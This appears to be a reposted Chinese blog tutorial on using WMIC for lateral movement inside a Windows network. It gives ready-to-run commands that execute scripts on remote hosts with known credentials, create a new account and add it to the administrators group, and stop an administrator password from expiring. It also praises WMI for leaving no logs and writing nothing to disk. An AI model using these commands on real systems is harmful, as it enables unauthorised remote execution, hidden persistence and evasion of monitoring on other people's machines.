zoukankan      html  css  js  c++  java
  • wmic 内网使用

    先决条件:

    1、远程服务器启动Windows Management Instrumentation服务,开放TCP135端口,防火墙放开对此端口的流量(默认放开);

    2、远程服务器的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”

    3、已知远程服务器或者主机的账号密码

    wmic /node:”192.168.1.20″ /user:”domainadministrator” /password:”123456″

    ### wmic  
    WMI 的全称是 Windows Management Instrumentation,它出现在所有的 Windows操作系统中,并由一组强大的工具集合组成,用于管理本地或远程的 Windows 系统,攻击者使用 wmi 来进行攻击,但 Windows 系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入到磁盘,增加了隐蔽性。推荐使用 wmic 进行远程执行命令。

    常用命令
    在远程系统上执行 bat 脚本

    1. wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create c:programdata est.bat

    在远程系统上执行单条命令

    1. wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create "cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add

    工具说明
    1、需要远程系统启动 Windows Management Instrumentation 服务,开放135端口
    2、远程系统的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”
    3、wmic 会以管理员权限在远程系统上执行命令
    4、防火墙开启将无法连接
    5、如果报错 “Invalid Global Switch” ,用双引号把包含-的结点括起来即可正常执行。

    wmic设置密码永不过期

    1. wmic useraccount where name="administrator" set passwordexpires=false
  • 相关阅读:
    第三次作业--团队展示(团队)
    第二次作业——个人项目实战
    软件工程实践2017第一次作业-准备
    Calculator PartⅢ
    C++课堂作业2016.05.04
    Masonry 等间隔或等宽高排列多个控件
    iOS绘图框架CoreGraphics分析
    UINavigationControlle 之 UINavigationBar及navigationItem关系探讨
    iOS
    iOS-加载数据的实现-MJRefresh
  • 原文地址:https://www.cnblogs.com/0xdd/p/11393392.html
Copyright © 2011-2022 走看看